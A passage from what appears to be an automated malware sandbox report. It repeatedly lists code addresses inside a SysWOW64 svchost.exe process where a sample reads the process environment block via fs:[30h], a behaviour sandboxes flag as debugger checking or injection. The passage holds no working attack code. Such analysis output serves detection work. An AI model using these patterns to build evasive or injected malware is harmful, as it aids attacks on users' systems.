            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]1_2_03C28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]1_2_03D04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
